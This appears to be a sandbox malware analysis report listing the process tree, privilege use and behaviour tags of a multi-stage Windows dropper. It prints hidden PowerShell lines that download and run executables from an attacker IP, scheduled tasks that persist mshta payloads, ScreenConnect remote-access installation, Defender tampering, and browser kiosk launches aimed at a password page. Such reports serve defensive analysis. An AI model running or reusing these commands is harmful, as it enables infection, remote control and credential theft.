pid Process 3744 1Q39x7.exe 3744 1Q39x7.exe 3940 skotes.exe 3940 skotes.exe 4996 2p7464.exe 4996 2p7464.exe 4996 2p7464.exe 4996 2p7464.exe 4996 2p7464.exe 4996 2p7464.exe 3996 3l82Y.exe 3996 3l82Y.exe 4896 skotes.exe 4896 skotes.exe 1396 sQ3DZPU.exe 348 MAl7pjE.exe 348 MAl7pjE.exe 348 MAl7pjE.exe 348 MAl7pjE.exe 348 MAl7pjE.exe 348 MAl7pjE.exe 3932 msiexec.exe 3932 msiexec.exe 412 powershell.exe 412 powershell.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 412 powershell.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1020 ScreenConnect.ClientService.exe 1628 TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE 1628 TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE 4576 powershell.exe 4576 powershell.exe 4576 powershell.exe 1564 powershell.exe 1564 powershell.exe 1628 TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE 1628 TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE 1628 TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE 1564 powershell.exe 2260 powershell.exe 2260 powershell.exe 4976 5afb3f6749.exe 4976 5afb3f6749.exe 2260 powershell.exe 4976 5afb3f6749.exe 4976 5afb3f6749.exe 4976 5afb3f6749.exe 4976 5afb3f6749.exe 2808 powershell.exe 2808 powershell.exe 2808 powershell.exe 3728 483d2fa8a0d53818306efeb32d3.exe 3728 483d2fa8a0d53818306efeb32d3.exe 728 fe90177534.exe 728 fe90177534.exe 728 fe90177534.exe 728 fe90177534.exe 728 fe90177534.exe 728 fe90177534.exe 1232 791fd74b89.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2332 a1EoH8b.exe Token: SeShutdownPrivilege 3704 msiexec.exe Token: SeIncreaseQuotaPrivilege 3704 msiexec.exe Token: SeSecurityPrivilege 3932 msiexec.exe Token: SeCreateTokenPrivilege 3704 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3704 msiexec.exe Token: SeLockMemoryPrivilege 3704 msiexec.exe Token: SeIncreaseQuotaPrivilege 3704 msiexec.exe Token: SeMachineAccountPrivilege 3704 msiexec.exe Token: SeTcbPrivilege 3704 msiexec.exe Token: SeSecurityPrivilege 3704 msiexec.exe Token: SeTakeOwnershipPrivilege 3704 msiexec.exe Token: SeLoadDriverPrivilege 3704 msiexec.exe Token: SeSystemProfilePrivilege 3704 msiexec.exe Token: SeSystemtimePrivilege 3704 msiexec.exe Token: SeProfSingleProcessPrivilege 3704 msiexec.exe Token: SeIncBasePriorityPrivilege 3704 msiexec.exe Token: SeCreatePagefilePrivilege 3704 msiexec.exe Token: SeCreatePermanentPrivilege 3704 msiexec.exe Token: SeBackupPrivilege 3704 msiexec.exe Token: SeRestorePrivilege 3704 msiexec.exe Token: SeShutdownPrivilege 3704 msiexec.exe Token: SeDebugPrivilege 3704 msiexec.exe Token: SeAuditPrivilege 3704 msiexec.exe Token: SeSystemEnvironmentPrivilege 3704 msiexec.exe Token: SeChangeNotifyPrivilege 3704 msiexec.exe Token: SeRemoteShutdownPrivilege 3704 msiexec.exe Token: SeUndockPrivilege 3704 msiexec.exe Token: SeSyncAgentPrivilege 3704 msiexec.exe Token: SeEnableDelegationPrivilege 3704 msiexec.exe Token: SeManageVolumePrivilege 3704 msiexec.exe Token: SeImpersonatePrivilege 3704 msiexec.exe Token: SeCreateGlobalPrivilege 3704 msiexec.exe Token: SeCreateTokenPrivilege 3704 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3704 msiexec.exe Token: SeLockMemoryPrivilege 3704 msiexec.exe Token: SeIncreaseQuotaPrivilege 3704 msiexec.exe Token: SeMachineAccountPrivilege 3704 msiexec.exe Token: SeTcbPrivilege 3704 msiexec.exe Token: SeSecurityPrivilege 3704 msiexec.exe Token: SeTakeOwnershipPrivilege 3704 msiexec.exe Token: SeLoadDriverPrivilege 3704 msiexec.exe Token: SeSystemProfilePrivilege 3704 msiexec.exe Token: SeSystemtimePrivilege 3704 msiexec.exe Token: SeProfSingleProcessPrivilege 3704 msiexec.exe Token: SeIncBasePriorityPrivilege 3704 msiexec.exe Token: SeCreatePagefilePrivilege 3704 msiexec.exe Token: SeCreatePermanentPrivilege 3704 msiexec.exe Token: SeBackupPrivilege 3704 msiexec.exe Token: SeRestorePrivilege 3704 msiexec.exe Token: SeShutdownPrivilege 3704 msiexec.exe Token: SeDebugPrivilege 3704 msiexec.exe Token: SeAuditPrivilege 3704 msiexec.exe Token: SeSystemEnvironmentPrivilege 3704 msiexec.exe Token: SeChangeNotifyPrivilege 3704 msiexec.exe Token: SeRemoteShutdownPrivilege 3704 msiexec.exe Token: SeUndockPrivilege 3704 msiexec.exe Token: SeSyncAgentPrivilege 3704 msiexec.exe Token: SeEnableDelegationPrivilege 3704 msiexec.exe Token: SeManageVolumePrivilege 3704 msiexec.exe Token: SeImpersonatePrivilege 3704 msiexec.exe Token: SeCreateGlobalPrivilege 3704 msiexec.exe Token: SeCreateTokenPrivilege 3704 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3704 msiexec.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 3744 1Q39x7.exe 3704 msiexec.exe 3772 647e3a57ba.exe 3772 647e3a57ba.exe 3772 647e3a57ba.exe 3704 msiexec.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 4104 1a1d30316b.exe 4104 1a1d30316b.exe 4104 1a1d30316b.exe 3296 32d10d4cf6.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 4516 msiexec.exe 4516 msiexec.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 3772 647e3a57ba.exe 3772 647e3a57ba.exe 3772 647e3a57ba.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 4104 1a1d30316b.exe 4104 1a1d30316b.exe 4104 1a1d30316b.exe 3296 32d10d4cf6.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 5028 firefox.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe 3296 32d10d4cf6.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5028 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1384 wrote to memory of 3040 1384 b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe 88 PID 1384 wrote to memory of 3040 1384 b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe 88 PID 1384 wrote to memory of 3040 1384 b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe 88 PID 3040 wrote to memory of 3744 3040 i2V63.exe 90 PID 3040 wrote to memory of 3744 3040 i2V63.exe 90 PID 3040 wrote to memory of 3744 3040 i2V63.exe 90 PID 3744 wrote to memory of 3940 3744 1Q39x7.exe 91 PID 3744 wrote to memory of 3940 3744 1Q39x7.exe 91 PID 3744 wrote to memory of 3940 3744 1Q39x7.exe 91 PID 3040 wrote to memory of 4996 3040 i2V63.exe 92 PID 3040 wrote to memory of 4996 3040 i2V63.exe 92 PID 3040 wrote to memory of 4996 3040 i2V63.exe 92 PID 1384 wrote to memory of 3996 1384 b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe 97 PID 1384 wrote to memory of 3996 1384 b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe 97 PID 1384 wrote to memory of 3996 1384 b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe 97 PID 3940 wrote to memory of 1396 3940 skotes.exe 98 PID 3940 wrote to memory of 1396 3940 skotes.exe 98 PID 3940 wrote to memory of 1396 3940 skotes.exe 98 PID 3940 wrote to memory of 2332 3940 skotes.exe 99 PID 3940 wrote to memory of 2332 3940 skotes.exe 99 PID 3940 wrote to memory of 2332 3940 skotes.exe 99 PID 2332 wrote to memory of 3704 2332 a1EoH8b.exe 100 PID 2332 wrote to memory of 3704 2332 a1EoH8b.exe 100 PID 2332 wrote to memory of 3704 2332 a1EoH8b.exe 100 PID 3932 wrote to memory of 3696 3932 msiexec.exe 103 PID 3932 wrote to memory of 3696 3932 msiexec.exe 103 PID 3932 wrote to memory of 3696 3932 msiexec.exe 103 PID 3696 wrote to memory of 976 3696 MsiExec.exe 104 PID 3696 wrote to memory of 976 3696 MsiExec.exe 104 PID 3696 wrote to memory of 976 3696 MsiExec.exe 104 PID 3940 wrote to memory of 348 3940 skotes.exe 108 PID 3940 wrote to memory of 348 3940 skotes.exe 108 PID 3940 wrote to memory of 348 3940 skotes.exe 108 PID 3932 wrote to memory of 4916 3932 msiexec.exe 110 PID 3932 wrote to memory of 4916 3932 msiexec.exe 110 PID 3940 wrote to memory of 3772 3940 skotes.exe 112 PID 3940 wrote to memory of 3772 3940 skotes.exe 112 PID 3940 wrote to memory of 3772 3940 skotes.exe 112 PID 3772 wrote to memory of 1192 3772 647e3a57ba.exe 141 PID 3772 wrote to memory of 1192 3772 647e3a57ba.exe 141 PID 3772 wrote to memory of 1192 3772 647e3a57ba.exe 141 PID 3772 wrote to memory of 3244 3772 647e3a57ba.exe 114 PID 3772 wrote to memory of 3244 3772 647e3a57ba.exe 114 PID 3772 wrote to memory of 3244 3772 647e3a57ba.exe 114 PID 3932 wrote to memory of 324 3932 msiexec.exe 116 PID 3932 wrote to memory of 324 3932 msiexec.exe 116 PID 3932 wrote to memory of 324 3932 msiexec.exe 116 PID 1192 wrote to memory of 1088 1192 cmd.exe 117 PID 1192 wrote to memory of 1088 1192 cmd.exe 117 PID 1192 wrote to memory of 1088 1192 cmd.exe 117 PID 3244 wrote to memory of 412 3244 mshta.exe 118 PID 3244 wrote to memory of 412 3244 mshta.exe 118 PID 3244 wrote to memory of 412 3244 mshta.exe 118 PID 3932 wrote to memory of 4772 3932 msiexec.exe 120 PID 3932 wrote to memory of 4772 3932 msiexec.exe 120 PID 3932 wrote to memory of 4772 3932 msiexec.exe 120 PID 3940 wrote to memory of 2056 3940 skotes.exe 124 PID 3940 wrote to memory of 2056 3940 skotes.exe 124 PID 3940 wrote to memory of 2056 3940 skotes.exe 124 PID 1020 wrote to memory of 3156 1020 ScreenConnect.ClientService.exe 127 PID 1020 wrote to memory of 3156 1020 ScreenConnect.ClientService.exe 127 PID 2056 wrote to memory of 4808 2056 cmd.exe 128 PID 2056 wrote to memory of 4808 2056 cmd.exe 128 PID 2056 wrote to memory of 4808 2056 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe"C:\Users\Admin\AppData\Local\Temp\b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i2V63.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\i2V63.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q39x7.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Q39x7.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1396 -
C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID:1728 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 13:54 /du 23:59 /sc daily /ri 1 /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"6⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3704
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:348
-
-
C:\Users\Admin\AppData\Local\Temp\1089179101\647e3a57ba.exe"C:\Users\Admin\AppData\Local\Temp\1089179101\647e3a57ba.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 2Aq6smakEho /tr "mshta C:\Users\Admin\AppData\Local\Temp\vgyQWjkQZ.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 2Aq6smakEho /tr "mshta C:\Users\Admin\AppData\Local\Temp\vgyQWjkQZ.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1088
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\vgyQWjkQZ.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:412 -
C:\Users\Admin\AppData\Local\TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE"C:\Users\Admin\AppData\Local\TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE"8⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1628
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "5⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word6⤵
- System Location Discovery: System Language Discovery
PID:4808 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- Delays execution with timeout.exe
PID:4972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2260
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "gobf2malhcj" /tr "mshta \"C:\Temp\xyREVjwiD.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:320
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\xyREVjwiD.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3728
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089264001\5afb3f6749.exe"C:\Users\Admin\AppData\Local\Temp\1089264001\5afb3f6749.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4976
-
-
C:\Users\Admin\AppData\Local\Temp\1089265001\fe90177534.exe"C:\Users\Admin\AppData\Local\Temp\1089265001\fe90177534.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:728
-
-
C:\Users\Admin\AppData\Local\Temp\1089266001\5eb81d9b73.exe"C:\Users\Admin\AppData\Local\Temp\1089266001\5eb81d9b73.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1576 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- System Location Discovery: System Language Discovery
PID:6928
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089267001\791fd74b89.exe"C:\Users\Admin\AppData\Local\Temp\1089267001\791fd74b89.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1232
-
-
C:\Users\Admin\AppData\Local\Temp\1089268001\55c38d1b84.exe"C:\Users\Admin\AppData\Local\Temp\1089268001\55c38d1b84.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\1089269001\32d10d4cf6.exe"C:\Users\Admin\AppData\Local\Temp\1089269001\32d10d4cf6.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3296 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
PID:348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:3140
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5028 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2008 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {365027fc-e4be-407f-88e0-866d1cee1669} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" gpu8⤵PID:2920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e98b978-2d4d-4298-bacc-8faadec7ec2d} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" socket8⤵PID:4920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 3112 -prefMapHandle 3128 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0af634cb-2018-406b-a4b0-20b38e04d95c} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab8⤵PID:1704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6252e3bc-8b0b-4e7b-a192-b0347feb5d24} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab8⤵PID:2652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4616 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4520 -prefMapHandle 4488 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7394237c-3e27-4de6-9bf6-51cf05ef0fe7} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" utility8⤵
- Checks processor information in registry
PID:7056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5376 -childID 3 -isForBrowser -prefsHandle 4808 -prefMapHandle 5372 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3f2147-062c-492f-b84c-eede652b8180} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab8⤵PID:5644
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5604 -childID 4 -isForBrowser -prefsHandle 5524 -prefMapHandle 5528 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57d09812-8a28-467b-a1de-a7faa42a8d44} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab8⤵PID:5704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5732 -childID 5 -isForBrowser -prefsHandle 5808 -prefMapHandle 5804 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e0405cd-0497-4b04-8e16-88653268e09b} 5028 "\\.\pipe\gecko-crash-server-pipe.5028" tab8⤵PID:5692
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089270001\1a1d30316b.exe"C:\Users\Admin\AppData\Local\Temp\1089270001\1a1d30316b.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
